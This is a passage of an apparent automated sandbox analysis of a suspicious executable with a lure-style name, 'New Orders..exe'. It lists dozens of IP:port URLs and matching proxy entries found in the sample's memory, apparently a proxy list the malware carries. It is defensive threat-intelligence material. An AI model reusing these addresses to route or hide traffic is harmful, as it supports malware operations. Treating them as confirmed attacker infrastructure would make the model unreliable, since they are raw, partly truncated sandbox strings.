                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:30011
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:30011://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:36363://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:40351
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:40351://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.157:51718://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:36219://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.241.8:62916://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.84.118:21777
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.222.84.118:21777://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.63.124:27294://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:32824
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.164.77:32824://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.220.201:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.230.210:6940
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.68.230.210:6940://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:27029
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:27029://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:40998
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.125.208:40998://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:11802://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:19693
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:19693://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:34144
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:34144://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:36694://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:37847
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.126.150:37847://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.206.209:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.75.74.18:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.65.164:31979://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.73.68:31979
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.77.73.68:31979://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.249.186:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:18636://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:22500://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:41746
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:41746://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.79.87.144:54395://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.186.179:51405://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.89.146:50605
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.81.89.146:50605://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.184.241:9191://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.4
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:17982://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:20435://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23313x
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:23854://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:26545://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:27887
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:27887://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:31724
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:31724://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:44719://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:54570
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:54570://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:55198://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:60775
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.89.173.40:60775://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.91.109.83:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.151.210.204:9000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.151.210.204:9000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.35.240.119:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.35.240.119:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.73.224.54:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.73.224.54:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.212.22.168:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.212.22.168:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.233.119.172:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.233.119.172:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:17188
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:17188://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:29796
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:29796://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:44587
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:44587://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.196.189:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.196.189:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.91.252:63843
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.91.252:63843://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://57.128.163.242:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://57.128.163.242:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002://proxy
